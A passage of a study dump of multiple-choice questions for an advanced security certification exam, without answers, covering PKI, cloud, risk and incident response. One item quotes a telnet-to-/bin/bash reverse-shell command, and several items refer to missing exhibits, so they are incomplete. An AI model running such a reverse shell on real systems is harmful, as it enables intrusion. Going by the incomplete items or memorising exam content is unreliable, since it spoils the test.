✑ The hacker took advantage of the account's excessive privileges to access a data store and exfiltrate the data without detection.
Which of the following is the BEST solution to help prevent this type of attack from being successful in the future? A. Dynamic analysis B. Secure web gateway C. Software composition analysis D. User behavior analysis E. Web application firewall.
Due to adverse events, a medium-sized corporation suffered a major operational disruption that caused its servers to crash and experience a major power outage. Which of the following should be created to prevent this type of issue in the future? A. SLA B. BIA C. BCM D. BCP E. RTO.
An analyst has prepared several possible solutions to a successful attack on the company. The solutions need to be implemented with the LEAST amount of downtime. Which of the following should the analyst perform? A. Implement all the solutions at once in a virtual lab and then run the attack simulation. Collect the metrics and then choose the best solution based on the metrics. B. Implement every solution one at a time in a virtual lab, running a metric collection each time. After the collection, run the attack simulation, roll back each solution, and then implement the next. Choose the best solution based on the best metrics. C. Implement every solution one at a time in a virtual lab, running an attack simulation each time while collecting metrics. Roll back each solution and then implement the next. Choose the best solution based on the best metrics. D. Implement all the solutions at once in a virtual lab and then collect the metrics. After collection, run the attack simulation. Choose the best solution based on the best metrics.
An investigator is attempting to determine if recent data breaches may be due to issues with a company's web server that offers news subscription services. The investigator has gathered the following data:
• Clients successfully establish TLS connections to web services provided by the server.
• After establishing the connections, most client connections are renegotiated.
• The renegotiated sessions use cipher suite TLS_RSA_WITH_NULL_SHA.
Which of the following is the MOST likely root cause? A. The clients disallow the use of modem cipher suites. B. The web server is misconfigured to support HTTP/1.1 C. A ransomware payload dropper has been installed. D. An entity is performing downgrade attacks on path.
A security analyst discovered that a database administrator's workstation was compromised by malware. After examining the logs, the compromised workstation was observed connecting to multiple databases through ODBC. The following query behavior was captured:Assuming this query was used to acquire and exfiltrate data, which of the following types of data was compromised, and what steps should the incident response plan contain? A. Personal health information; Inform the human resources department of the breach and review the DLP logs. B. Account history; Inform the relationship managers of the breach and create new accounts for the affected users. C. Customer IDs; Inform the customer service department of the breach and work to change the account numbers. D. PAN; Inform the legal department of the breach and look for this data in dark web monitoring.
The Chief Information Officer (CIO) wants to implement enterprise mobility throughout the organization. The goal is to allow employees access to company resources. However, the CIO wants the ability to enforce configuration settings, manage data, and manage both company-owned and personal devices. Which of the following should the CIO implement to achieve this goal? A. BYOD B. CYOD C. COPE D. MDM.
A security analyst sees that a hacker has discovered some keys and they are being made available on a public website. The security analyst is then able to successfully decrypt that data using the keys from the website. Which of the following should the security analyst recommend to protect the affected data? A. Key rotation B. Key escrow C. Zeroization D. Cryptographic obfuscation.
Which of the following is MOST commonly found in a network SLA contract? A. Price for extra services B. Performance metrics C. Service provider responsibility only D. Limitation of liability E. Confidentiality and non-disclosure.
A security operations center analyst is investigating anomalous activity between a database server and an unknown external IP address and gathered the following data:
• dbadmin last logged in at 7:30 a.m. and logged out at 8:05 a.m.
• A persistent TCP/6667 connection to the external address was established at 7:55 a.m. The connection is still active.
• Other than bytes transferred to keep the connection alive, only a few kilobytes of data transfer every hour since the start of the connection.
• A sample outbound request payload from PCAP showed the ASCII content: "JOIN #community".
Which of the following is the MOST likely root cause? A. A SQL injection was used to exfiltrate data from the database server. B. The system has been hijacked for cryptocurrency mining. C. A botnet Trojan is installed on the database server. D. The dbadmin user is consulting the community for help via Internet Relay Chat.
Which of the following describes the system responsible for storing private encryption/decryption files with a third party to ensure these files are stored safely? A. Key escrow B. TPM C. Trust models D. Code signing.
A security administrator has been tasked with hardening a domain controller against lateral movement attacks. Below is an output of running services:Which of the following configuration changes must be made to complete this task? A. Stop the Print Spooler service and set the startup type to disabled. B. Stop the DNS Server service and set the startup type to disabled. C. Stop the Active Directory Web Services service and set the startup type to disabled. D. Stop Credential Manager service and leave the startup type to disabled.
In comparison to other types of alternative processing sites that may be invoked as a part of disaster recovery, cold sites are different because they: A. have basic utility coverage, including power and water. B. provide workstations and read-only domain controllers. C. are generally the least costly to sustain. D. are the quickest way to restore business. E. are geographically separated from the company's primary facilities.
A security architect works for a manufacturing organization that has many different branch offices. The architect is looking for a way to reduce traffic and ensure the branch offices receive the latest copy of revoked certificates issued by the CA at the organization’s headquarters location. The solution must also have the lowest power requirement on the CA.
Which of the following is the BEST solution? A. Deploy an RA on each branch office. B. Use Delta CRLs at the branches. C. Configure clients to use OCSP. D. Send the new CRLs by using scheduled jobs.
An enterprise is undergoing an audit to review change management activities when promoting code to production. The audit reveals the following:
• Some developers can directly publish code to the production environment.
• Static code reviews are performed adequately.
• Vulnerability scanning occurs on a regularly scheduled basis per policy.
Which of the following should be noted as a recommendation within the audit report? A. Implement short maintenance windows. B. Perform periodic account reviews. C. Implement job rotation. D. Improve separation of duties.
A security researcher has been given an executable that was captured by a honeypot. Which of the following should the security researcher implement to test the executable? A. OSINT B. SAST C. DAST D. OWASP.
An executive has decided to move a company's customer-facing application to the cloud after experiencing a lengthy power outage at a locally managed service provider's data center. The executive would like a solution that can be implemented as soon as possible. Which of the following will BEST prevent similar issues when the service is running in the cloud? (Choose two.) A. Placing the application instances in different availability zones B. Restoring the snapshot and starting the new application instance from a different zone C. Enabling autoscaling based on application instance usage D. Having several application instances running in different VPCs E. Using the combination of block storage and multiple CDNs in each application instance F. Setting up application instances in multiple regions.
A hospitality company experienced a data breach that included customer PII. The hacker used social engineering to convince an employee to grant a third-party application access to some company documents within a cloud file storage service Which of the following is the BEST solution to help prevent this type of attack in the future? A. NGFW for web traffic inspection and activity monitoring B. CSPM for application configuration control C. Targeted employee training and awareness exercises D. CASB for OAuth application permission control.
A product manager at a new company needs to ensure the development team produces high-quality code on time. The manager has decided to implement an agile development approach instead of waterfall. Which of the following are reasons to choose an agile development approach? (Choose two.) A. The product manager gives the developers more autonomy to write quality code prior to deployment. B. An agile approach incorporates greater application security in the development process than a waterfall approach does. C. The scope of work is expected to evolve during the lifetime of project development. D. The product manager prefers to have code iteratively tested throughout development. E. The product manager would like to produce code in linear phases. F. Budgeting and creating a timeline for the entire project is often more straightforward using an agile approach rather than waterfall.
An auditor needs to scan documents at rest for sensitive text. These documents contain both text and images. Which of the following software functionalities must be enabled in the DLP solution for the auditor to be able to fully read these documents? (Choose two.) A. Document interpolation B. Regular expression pattern matching C. Optical character recognition functionality D. Baseline image matching E. Advanced rasterization F. Watermarking.
A security analyst is performing a review of a web application. During testing as a standard user, the following error log appears:Which of the following BEST describes the analyst's findings and a potential mitigation technique? A. The findings indicate unsecure references. All potential user input needs to be properly sanitized. B. The findings indicate unsecure protocols All cookies should be marked as HttpOnly. C. The findings indicate information disclosure. The displayed error message should be modified. D. The findings indicate a SQL injection. The database needs to be upgraded.
A local university that has a global footprint is undertaking a complete overhaul of its website and associated systems Some of the requirements are:
• Handle an increase in customer demand of resources
• Provide quick and easy access to information
• Provide high-quality streaming media
• Create a user-friendly interface
Which of the following actions should be taken FIRST? A. Deploy high-availability web servers. B. Enhance network access controls. C. Implement a content delivery network. D. Migrate to a virtualized environment.
In order to save money, a company has moved its data to the cloud with a low-cost provider. The company did not perform a security review prior to the move; however, the company requires all of its data to be stored within the country where the headquarters is located. A new employee on the security team has been asked to evaluate the current provider against the most important requirements. The current cloud provider that the company is using offers:
• Only multitenant cloud hosting
• Minimal physical security
• Few access controls
• No access to the data center
The following information has been uncovered:
• The company is located in a known floodplain. which flooded last year.
• Government regulations require data to be stored within the country.
Which of the following should be addressed FIRST? A. Update the disaster recovery plan to account for natural disasters. B. Establish a new memorandum of understanding with the cloud provider. C. Establish a new service-level agreement with the cloud provider. D. Provision services according to the appropriate legal requirements.
A security administrator needs to implement an X.509 solution for multiple sites within the human resources department. This solution would need to secure all subdomains associated with the domain name of the main human resources web server. Which of the following would need to be implemented to properly secure the sites and provide easier private key management? A. Certificate revocation list B. Digital signature C. Wildcard certificate D. Registration authority E. Certificate pinning.
An organization’s threat team is creating a model based on a number of incidents in which systems in an air-gapped location are compromised. Physical access to the location and logical access to the systems are limited to administrators and select, approved, on-site company employees. Which of the following is the BEST strategy to reduce the risks of data exposure? A. NDAs B. Mandatory access control C. NIPS D. Security awareness training.
An organization is establishing a new software assurance program to vet applications before they are introduced into the production environment. Unfortunately, many of the applications are provided only as compiled binaries. Which of the following should the organization use to analyze these applications? (Choose two.) A. Regression testing B. SAST C. Third-party dependency management D. IDE SAST E. Fuzz testing F. IAST.
Which of the following agreements includes no penalties and can be signed by two entities that are working together toward the same goal? A. MOU B. NDA C. SLA D. ISA.
Which of the following BEST describes a common use case for homomorphic encryption? A. Processing data on a server after decrypting in order to prevent unauthorized access in transit B. Maintaining the confidentiality of data both at rest and in transit to and from a CSP for processing C. Transmitting confidential data to a CSP for processing on a large number of resources without revealing information D. Storing proprietary data across multiple nodes in a private cloud to prevent access by unauthenticated users.
A security analyst runs a vulnerability scan on a network administrator's workstation. The network administrator has direct administrative access to the company’s SSO web portal. The vulnerability scan uncovers critical vulnerabilities with equally high CVSS scores for the user's browser, OS, email client, and an offline password manager. Which of the following should the security analyst patch FIRST? A. Email client B. Password manager C. Browser D. OS.
An organization is moving its intellectual property data from on premises to a CSP and wants to secure the data from theft. Which of the following can be used to mitigate this risk? A. An additional layer of encryption B. A third-party, data integrity monitoring solution C. A complete backup that is created before moving the data D. Additional application firewall rules specific to the migration.
A software developer is working on a piece of code required by a new software package. The code should use a protocol to verify the validity of a remote identity. Which of the following should the developer implement in the code? A. RSA B. OCSP C. HSTS D. CRL.
Users are reporting intermittent access issues with a new cloud application that was recently added to the network. Upon investigation, the security administrator notices the human resources department is able to run required queries with the new application, but the marketing department is unable to pull any needed reports on various resources using the new application. Which of the following MOST likely needs to be done to avoid this in the future? A. Modify the ACLs. B. Review the Active Directory. C. Update the marketing department's browser. D. Reconfigure the WAF.
A server in a manufacturing environment is running an end-of-life operating system. The vulnerability management team is recommending that the server be upgraded to a supported operating system, but the ICS software running on the server is not compatible with modem operating systems. Which of the following compensating controls should be implemented to BEST protect the server? A. Application allow list B. Antivirus C. HIPS D. Host-based firewall.
A firewall administrator needs to ensure all traffic across the company network is inspected. The administrator gathers data and finds the following information regarding the typical traffic in the network:Which of the following is the BEST solution to ensure the administrator can complete the assigned task?
A. A full-tunnel VPN B. Web content filtering C. An endpoint DLP solution D. SSL/TLS decryption.
A city government's IT director was notified by the city council that the following cybersecurity requirements must be met to be awarded a large federal grant:
• Logs for all critical devices must be retained for 365 days to enable monitoring and threat hunting.
• All privileged user access must be tightly controlled and tracked to mitigate compromised accounts.
• Ransomware threats and zero-day vulnerabilities must be quickly identified.
Which of the following technologies would BEST satisfy these requirements? (Choose three.) A. Endpoint protection B. Log aggregator C. Zero trust network access D. PAM E. Cloud sandbox F. SIEM G. NGFW.
Company A acquired Company B. During an initial assessment, the companies discover they are using the same SSO system. To help users with the transition. Company A is requiring the following:
• Before the merger is complete, users from both companies should use a single set of usernames and passwords.
• Users in the same departments should have the same set of rights and privileges, but they should have different sets of rights and privileges if they have different IPs.
• Users from Company B should be able to access Company A's available resources.
Which of the following are the BEST solutions? (Choose two.) A. Installing new Group Policy Object policies B. Establishing one-way trust from Company B to Company A C. Enabling SAML D. Implementing attribute-based access control E. Installing Company A’s Kerberos systems in Company B's network F. Updating login scripts.
Prior to a risk assessment inspection, the Chief Information Officer tasked the systems administrator with analyzing and reporting any configuration issues on the information systems, and then verifying existing security settings. Which of the following would be BEST to use? A. SCAP B. CVSS C. XCCDF D. CMDB.
An organization is looking to establish more robust security measures by implementing PKI. Which of the following should the security analyst implement when considering mutual authentication? A. Perfect forward secrecy on both endpoints B. Shared secret for both endpoints C. Public keys on both endpoints D. A common public key on each endpoint E. A common private key on each endpoint.
An organization's senior security architect would like to develop cyberdefensive strategies based on standardized adversary techniques, tactics, and procedures commonly observed. Which of the following would BEST support this objective? A. OSINT analysis B. The Diamond Model of Intrusion Analysis C. MITRE ATT&CK D. Deepfake generation E. Closed-source intelligence reporting.
A developer wants to maintain integrity to each module of a program and ensure controls are in place to detect unauthorized code modification. Which of the following would be BEST for the developer to perform? (Choose two.) A. Utilize code signing by a trusted third party. B. Implement certificate-based authentication. C. Verify MD5 hashes. D. Compress the program with a password. E. Encrypt with 3DES. F. Make the DACL read-only.
A security solution uses a sandbox environment to execute zero-day software and collect indicators of compromise. Which of the following should the organization do to BEST take advantage of this solution? A. Develop an Nmap plug-in to detect the indicator of compromise. B. Update the organization's group policy. C. Include the signature in the vulnerability scanning tool. D. Deliver an updated threat signature throughout the EDR system.
A company wants to implement a new website that will be accessible via browsers with no mobile applications available. The new website will allow customers to submit sensitive medical information securely and receive online medical advice. The company already has multiple other websites where it provides various public health data and information. The new website must implement the following:
• The highest form of web identity validation
• Encryption of all web transactions
• The strongest encryption in-transit
• Logical separation based on data sensitivity
Other things that should be considered include:
• The company operates multiple other websites that use encryption.
• The company wants to minimize total expenditure.
• The company wants to minimize complexity.
Which of the following should the company implement on its new website? (Choose two.) A. Wildcard certificate B. EV certificate C. Mutual authentication D. Certificate pinning E. SSO F. HSTS.
Which of the following is used to assess compliance with internal and external requirements? A. RACI matrix B. Audit report C. After-action report D. Business continuity plan.
A network administrator for a completely air-gapped and closed system has noticed that anomalous external files have been uploaded to one of the critical servers. The administrator has reviewed logs in the SIEM that were collected from security appliances, network infrastructure devices, and endpoints. Which of the following processes, if executed, would be MOST likely to expose an attacker? A. Reviewing video from IP cameras within the facility B. Reconfiguring the SIEM connectors to collect data from the perimeter network hosts C. Implementing integrity checks on endpoint computing devices D. Looking for privileged credential reuse on the network.
A security engineer is implementing a server-side TLS configuration that provides forward secrecy and authenticated encryption with associated data. Which of the following algorithms, when combined into a cipher suite, will meet these requirements? (Choose three.) A. EDE B. CBC C. GCM D. AES E. RSA F. RC4 G. ECDSA H. DH.
A security architect is advising the application team to implement the following controls in the application before it is released:
• Least privilege
• Blocklist input validation for the following characters: \<>;, ="#+
Based on the requirements, which of the following attacks is the security architect trying to prevent? A. XML injection B. LDAP injection C. CSRF D. XSS.
A company wants to use a process to embed a sign of ownership covertly inside a proprietary document without adding any identifying attributes. Which of the following would be BEST to use as part of the process to support copyright protections of the document? A. Steganography B. E-signature C. Watermarking D. Cryptography.
An organization is assessing the security posture of a new SaaS CRM system that handles sensitive PII and identity information, such as passport numbers. The SaaS CRM system does not meet the organization's current security standards. Post remediation work, the assessment recorded the following:
1. There will be a $20.000 per day revenue loss for each day the system is delayed going into production.
2. The inherent risk was high.
3. The residual risk is now low.
4. The solution rollout to the contact center will be a staged deployment.
Which of the following risk-handling techniques will BEST meet the organization’s requirements post remediation? A. Apply for a security exemption, as the risk is too high to accept. B. Transfer the risk to the SaaS CRM vendor, as the organization is using a cloud service. C. Accept the risk, as compensating controls have been implemented to manage the risk. D. Avoid the risk by accepting the shared responsibility model with the SaaS CRM provider.
A security analyst is using data provided from a recent penetration test to calculate CVSS scores to prioritize remediation. Which of the following metric groups would the analyst need to determine to get the overall scores? (Choose three.) A. Temporal B. Availability C. Integrity D. Confidentiality E. Base F. Environmental G. Impact H. Attack vector.
During a recent security incident investigation, a security analyst mistakenly turned off the infected machine prior to consulting with a forensic analyst. Upon rebooting the machine, a malicious script that was running as a background process was no longer present. As a result, potentially useful evidence was lost. Which of the following should the security analyst have followed? A. Order of volatility B. Chain of custody C. Verification D. Secure storage.
A global organization's Chief Information Security Officer (CISO) has been asked to analyze the risks involved in a plan to move the organization's current MPLS-based WAN network to use commodity internet and SD-WAN hardware. The SD-WAN provider is currently highly regarded but is a regional provider. Which of the following is MOST likely identified as a potential risk by the CISO? A. The SD-WAN provider would not be able to handle the organization's bandwidth requirements. B. The operating costs of the MPLS network are too high for the organization. C. The SD-WAN provider may not be able to support the required troubleshooting and maintenance. D. Internal IT staff will not be able to properly support remote offices after the migration.
A company has received threat intelligence about bad routes being advertised. The company has also been receiving reports of degraded internet activity. When looking at the routing table on the edge router, a security engineer discovers the following:Which of the following can the company implement to prevent receiving bad routes from peers, while still allowing dynamic updates? A. OSPF prefix list B. BGP prefix list C. EIGRP prefix list D. DNS.
A company has moved its sensitive workloads to the cloud and needs to ensure high availability and resiliency of its web-based application. The cloud architecture team was given the following requirements:
• The application must run at 70% capacity at all times
• The application must sustain DoS and DDoS attacks.
• Services must recover automatically.
Which of the following should the cloud architecture team implement? (Choose three.) A. Read-only replicas B. BCP C. Autoscaling D. WAF E. CDN F. Encryption G. Continuous snapshots H. Containerization.
A security architect is implementing a web application that uses a database back end. Prior to production, the architect is concerned about the possibility of XSS attacks and wants to identify security controls that could be put in place to prevent these attacks. Which of the following sources could the architect consult to address this security concern? A. SDLC B. OVAL C. IEEE D. OWASP.
A security architect is working with a new customer to find a vulnerability assessment solution that meets the following requirements:
• Fast scanning
• The least false positives possible
• Signature-based
• A low impact on servers when performing a scan
In addition, the customer has several screened subnets, VLANs, and branch offices. Which of the following will BEST meet the customer's needs? A. Authenticated scanning B. Passive scanning C. Unauthenticated scanning D. Agent-based scanning.
Real-time, safety-critical systems MOST often use serial busses that: A. have non-deterministic behavior and are not deployed with encryption. B. have non-deterministic behavior and are deployed with encryption. C. have deterministic behavior and are deployed with encryption. D. have deterministic behavior and are not deployed with encryption.
A company wants to securely manage the APIs that were developed for its in-house applications. Previous penetration tests revealed that developers were embedding unencrypted passwords in the code. Which of the following can the company do to address this finding? (Choose two.) A. Implement complex, key-length API key management. B. Implement user session logging. C. Implement time-based API key management. D. Use SOAP instead of restful services. E. Incorporate a DAST into the DevSecOps process to identify the exposure of secrets. F. Enforce MFA on the developers’ workstations and production systems.
When a remote employee traveled overseas, the employee’s laptop and several mobile devices with proprietary tools were stolen. The security team requires technical controls be in place to ensure no electronic data is compromised or changed. Which of the following BEST meets this requirement? A. Mobile device management with remote wipe capabilities B. Passwordless smart card authorization with biometrics C. Next-generation endpoint detection and response agent D. Full disk encryption with centralized key management.
A penetration tester inputs the following command:
telnet 192.168.99.254 343 ! /bin/bash | telnet 192.168.99.254 344
This command will allow the penetration tester to establish a: A. port mirror. B. network pivot. C. reverse shell. D. proxy chain.
Which of the following is the MOST important cloud-specific risk from the CSP’s viewpoint? A. CI/CD deployment failure
B. Management plane breach C. Insecure data deletion D. Resource exhaustion.
A security engineer is reviewing a record of events after a recent data breach incident that involved the following:
• A hacker conducted reconnaissance and developed a footprint of the company’s Internet-facing web application assets.
• A vulnerability in a third-party library was exploited by the hacker, resulting in the compromise of a local account.
• The hacker took advantage of the account’s excessive privileges to access a data store and exfiltrate the data without detection.
Which of the following is the BEST solution to help prevent this type of attack from being successful in the future? A. Dynamic analysis B. Secure web gateway C. Software composition analysis D. User behavior analysis E. Stateful firewall.
A security architect updated the security policy to require a proper way to verify that packets received between two parties have not been tampered with and the connection remains private. Which of the following cryptographic techniques can be used to ensure the security policy is being enforced properly? A. MD5-based envelope method B. HMAC_SHA256 C. PBKDF2 D. PGP.
A software assurance analyst reviews an SSH daemon’s source code and sees the following:Based on this code snippet, which of the following attacks is MOST likely to succeed? A. Race condition B. Cross-site scripting
C. Integer overflow D. Driver shimming.
A security analyst for a managed service provider wants to implement the most up-to-date and effective security methodologies to provide clients with the best offerings. Which of the following resources would the analyst MOST likely adopt? A. OSINT B. ISO C. MITRE ATT&CK D. OWASP.
A security manager wants to transition the organization to a zero trust architecture. To meet this requirement, the security manager has instructed administrators to remove trusted zones, role-based access, and one-time authentication. Which of the following will need to be implemented to achieve this objective? (Choose three.) A. Least privilege B. VPN C. Policy automation D. PKI E. Firewall F. Continuous validation G. Continuous integration H. IaaS.
A security architect for a manufacturing company must ensure that a new acquisition of IoT devices is securely integrated into the company’s Infrastructure. The devices should not directly communicate with other endpoints on the network and must be subject to network traffic monitoring to identify anomalous traffic. Which of the following would be the BEST solution to meet these requirements? A. Block all outbound traffic and implement an inline firewall. B. Allow only wireless connections and proxy the traffic through a network tap. C. Establish an air-gapped network and implement an IDS. D. Use a separate VLAN with an ACL and implement network detection and response.
A digital forensics expert has obtained an ARM binary suspected of including malicious behavior. The expert would like to trace and analyze the ARM binary’s execution. Which of the following tools would BEST support this effort? A. objdump B. OllyDbg C. FTK Imager D. Ghidra.
A software developer was just informed by the security team that the company’s product has several vulnerabilities. Most of these vulnerabilities were traced to code the developer did not write. The developer does not recognize some of the code, as it was in the software before the developer started on the program and is not tracked for licensing purposes. Which of the following would the developer MOST likely do to mitigate the risks and prevent further issues like these from occurring? A. Perform supply chain analysis and require third-party suppliers to implement vulnerability management programs. B. Perform software composition analysis and remediate vulnerabilities found in the software. C. Perform reverse engineering on the code and rewrite the code in a more secure manner. D. Perform fuzz testing and implement DAST in the code repositories to find vulnerabilities prior to deployment.
A significant weather event caused all systems to fail over to the disaster recovery site successfully. However, successful data replication has not occurred in the last six months, which has resulted in the service being unavailable. Which of the following would BEST prevent this scenario form happening again? A. Performing routine tabletop exercises B. Implementing scheduled, full interruption tests C. Backing up system log reviews D. Performing department disaster recovery walk-throughs.
An organization developed an incident response plan. Which of the following would be BEST to assess the effectiveness of the plan? A. Requesting a third-party review B. Generating a checklist by organizational unit C. Establishing role succession and call lists D. Creating a playbook E. Performing a tabletop exercise.
A new mandate by the corporate security team requires that all endpoints must meet a security baseline before accessing the corporate network. All servers and desktop computers are scanned by the dedicated internal scanner appliance installed in each subnet. However, remote worker laptops do not access the network regularly. Which of the following is the BEST option for the security team to ensure remote worker laptops are scanned before being granted access to the corporate network? A. Implement network access control to perform host validation of installed patches. B. Create an 802.1X implementation with certificate-based device identification. C. Create a vulnerability scanning subnet for remote workers to connect to on the network at headquarters. D. Install a vulnerability scanning agent on each remote laptop to submit scan data.
A penetration tester is testing a company’s login form for a web application using a list of known usernames and a common password list. According to a brute-force utility, the penetration tester needs to provide the tool with the proper headers, POST URL with variable names, and the error string returned with an improper login. Which of the following would BEST help the tester to gather this information? (Choose two.) A. The new source feature of the web browser B. The logs from the web server C. The inspect feature from the web browser D. A tcpdump from the web server E. An HTTP interceptor F. The website certificate viewed via the web browser.
A security analyst has concerns about malware on an endpoint. The malware is unable to detonate by modifying the kernel response to various system calls. As a test, the analyst modifies a Windows server to respond to system calls as if it was a Linux server. In another test, the analyst modifies the operating system to prevent the malware from identifying target files. Which of the following techniques is the analyst MOST likely using? A. Honeypot B. Deception C. Simulators D. Sandboxing.
Users are claiming that a web server is not accessible. A security engineer is unable to view the Internet Services logs for the site. The engineer connects to the server and runs netstat – an and receives the following output:Which of the following is MOST likely happening to the server? A. Port scanning B. ARP spoofing C. Buffer overflow D. Denial of service.
An architect is designing security scheme for an organization that is concerned about APTs. Any proposed architecture must meet the following requirements:
• Services must be able to be reconstituted quickly from a known-good state.
• Network services must be designed to ensure multiple diverse layers of redundancy.
• Defensive and responsive actions must be automated to reduce human operator demands.
Which of the following designs must be considered to ensure the architect meets these requirements? (Choose three.) A. Increased efficiency by embracing advanced caching capabilities B. Geographic distribution of critical data and services C. Hardened and verified container usage D. Emulated hardware architecture usage E. Establishment of warm and hot sites for continuity of operations F. Heterogeneous architecture G. Deployment of IPS services that can identify and block malicious traffic H. Implementation and configuration of a SOAR.
A company is on a deadline to roll out an entire CRM platform to all users at one time. However, the company is behind schedule due to reliance on third-party vendors. Which of the following development approaches will allow the company to begin releases but also continue testing and development for future releases? A. Implement iterative software releases B. Revise the scope of the project to use a waterfall approach. C. Change the scope of the project to use the spiral development methodology. D. Perform continuous integration.
A third-party organization has implemented a system that allows it to analyze customers’ data and deliver analysis results without being able to see the raw data. Which of the following is the organization implementing? A. Asynchronous keys B. Homomorphic encryption C. Data lake D. Machine learning.
Which of the following communication protocols is used to create PANs with small, low-power digital radios and supports a large number of nodes? A. Zigbee B. Wi-Fi C. CAN D. Modbus E. DNP3.
A software development company is building a new mobile application for its social media platform. The company wants to gain its users’ trust by reducing the risk of on-path attacks between the mobile client and its servers and by implementing stronger digital trust. To support users’ trust, the company has released the following internal guidelines:
• Mobile clients should verity the identity of all social media servers locally.
• Social media servers should improve TLS performance of their certificate status.
• Social media servers should inform the client to only use HTTPS.
Given the above requirements, which of the following should the company implement? (Choose two.) A. Quick UDP internet connection B. OCSP stapling C. Private CA D. DNSSEC E. CRL F. HSTS G. Distributed object model.
Due to budget constraints, an organization created a policy that only permits vulnerabilities rated high and critical according to CVSS to be fixed or mitigated. A security analyst notices that many vulnerabilities that were previously scored as medium are now breaching higher thresholds. Upon further investigation, the analyst notices certain ratings are not aligned with the approved system categorization.
Which of the following can the analyst do to get a better picture of the risk while adhering to the organization’s policy? A. Align the exploitability metrics to the predetermined system categorization. B. Align the remediation levels to the predetermined system categorization. C. Align the impact subscore requirements to the predetermined system categorization. D. Align the attack vectors to the predetermined system categorization.
A cloud engineer is tasked with improving the responsiveness and security of a company’s cloud-based web application. The company is concerned that international users will experience increased latency.
Which of the following is the BEST technology to mitigate this concern? A. Caching B. Containerization C. Content delivery network D. Clustering.
An organization thinks that its network has active, malicious activity on it. Which of the following capabilities would BEST help to expose the adversary? A. Installing a honeypot and other decoys B. Expanding SOC functions to include hunting C. Enumerating asset configurations D. Performing a penetration test.
An engineering team has deployed a new VPN service that requires client certificates to be used in order to successfully connect. On iOS devices, however, the following error occurs after importing the .p12 certificate file:
mbedTLS: ca certificate is undefined
Which of the following is the root cause of this issue? A. iOS devices have an empty root certificate chain by default. B. OpenSSL is not configured to support PKCS#12 certificate files. C. The VPN client configuration is missing the CA private key. D. The iOS keychain imported only the client public and private keys.
A security engineer has been informed by the firewall team that a specific Windows workstation is part of a command-and-control network. The only information the security engineer is receiving is that the traffic is occurring on a non-standard port (TCP 40322). Which of the following commands should the security engineer use FIRST to find the malicious process? A. tcpdump B. netstat C. tasklist D. traceroute E. ipconfig.
In a shared responsibility model for PaaS, which of the following is a customer's responsibility? A. Network security B. Physical security C. OS security D. Host infrastructure.
A security engineer notices the company website allows users to select which country they reside in, such as the following example:
https://mycompany.com/main.php?Country=US
Which of the following vulnerabilities would MOST likely affect this site? A. SQL injection B. Remote file inclusion C. Directory traversal D. Unsecure references.
A bank has multiple subsidiaries that have independent infrastructures. The bank's support teams manage all these environments and want to use a single set of credentials. Which of the following is the BEST way to achieve this goal? A. SSO B. Federation C. Cross-domain D. Shared credentials.
A SaaS startup is maturing its DevSecOps program and wants to identify weaknesses earlier in the development process in order to reduce the average time to identify serverless application vulnerabilities and the costs associated with remediation. The startup began its early security testing efforts with DAST to cover public-facing application components and recently implemented a bug bounty program. Which of the following will BEST accomplish the company’s objectives? (Choose two.) A. IAST B. RASP C. SAST D. SCA E. WAF F. CMS.
Which of the following indicates when a company might not be viable after a disaster? A. Maximum tolerable downtime B. Recovery time objective C. Mean time to recovery D. Annual loss expectancy.
During an incident, an employee's web traffic was redirected to a malicious domain. The workstation was compromised, and the attacker was able to modify sensitive data from the company file server. Which of the following solutions would have BEST prevented the initial compromise from happening? (Choose two.) A. DNSSEC B. FIM C. Segmentation D. Firewall E. DLP F. Web proxy.
A software company wants to build a platform by integrating with another company's established product. Which of the following provisions would be MOST important to include when drafting an agreement between the two companies? A. Data sovereignty B. Shared responsibility C. Source code escrow D. Safe harbor considerations.
A security administrator sees several hundred entries in a web server security log that are similar to the following:The network source varies, but the URL, status, and user agent are the same. Which of the following would BEST protect the web server without blocking legitimate traffic? A. Replace the file xmlrpc.php with a honeypot form to collect further IOCs. B. Automate the addition of bot IP addresses into a deny list for the web host. C. Script the daily collection of the WHOIS ranges to add to the WAF as a denied ACL. D. Block every subnet that is identified as having a bot that is a source of the traffic.
An organization had been leveraging RC4 to protect the confidentiality of a continuous, high-throughput 4K video stream but must upgrade to a more modern cipher. The new cipher must maximize speed, particularly on endpoints without crypto instruction sets or coprocessors. Which of the following is MOST likely to meet the organization's requirements? A. ChaCha20 B. ECDSA C. Blowfish D. AES-GCM E. AES-CBC.
Which of the following processes involves searching and collecting evidence during an investigation or lawsuit? A. E-discovery B. Review analysis C. Information governance D. Chain of custody.
A domestic, publicly traded, online retailer that sells makeup would like to reduce the risks to the most sensitive type of data within the organization but also the impact to compliance. A risk analyst is performing an assessment of the collection and processing of data used within business processes. Which of the following types of data pose the GREATEST risk? (Choose two.) A. Financial data from transactions B. Shareholder meeting minutes C. Data of possible European customers D. Customers' shipping addresses E. Deidentified purchasing habits F. Consumer product purchasing trends.
A security engineer is creating a single CSR for the following web server hostnames:
• wwwint.internal
• www.company.com
• home.internal
• www.internal
Which of the following would meet the requirement? A. SAN B. CN C. CA D. CRL E. Issuer.
A managed security provider (MSP) is engaging with a customer who was working through a complete digital transformation. Part of this transformation involves a move to cloud servers to ensure a scalable, high-performance, online user experience. The current architecture includes:
• Directory servers
• Web servers
• Database servers
• Load balancers
• Cloud-native VPN concentrator
• Remote access server
The MSP must secure this environment similarly to the infrastructure on premises. Which of the following should the MSP put in place to BEST meet this objective? (Choose three.) A. Content delivery network B. Virtual next-generation firewall C. Web application firewall D. Software-defined WAN E. External vulnerability scans F. Containers.
A security analyst has been tasked with providing key information in the risk register. Which of the following outputs or results would be used to BEST provide the information needed to determine the security posture for a risk decision? (Choose two.) A. Password cracker B. SCAP scanner C. Network traffic analyzer D. Vulnerability scanner E. Port scanner F. Protocol analyzer.
An organization is in frequent litigation and has a large number of legal holds. Which of the following types of functionality should the organization's new email system provide? A. DLP B. Encryption
C. E-discovery D. Privacy-level agreements.
A security engineer based in Iceland works in an environment requiring an on-premises and cloud-based storage solution. The solution should take into consideration the following:
1. The company has sensitive data.
2. The company has proprietary data.
3. The company has its headquarters in Iceland, and the data must always reside in that country.
Which cloud deployment model should be used? A. Hybrid cloud B. Community cloud C. Public cloud D. Private cloud.
When managing and mitigating SaaS cloud vendor risk, which of the following responsibilities belongs to the client? A. Data B. Storage
C. Physical security D. Network.
Which of the following should be established when configuring a mobile device to protect user internet privacy, to ensure the connection is encrypted, and to keep user activity hidden? (Choose two.) A. Proxy B. Tunneling C. VDI D. MDM E. RDP F. MAC address randomization.
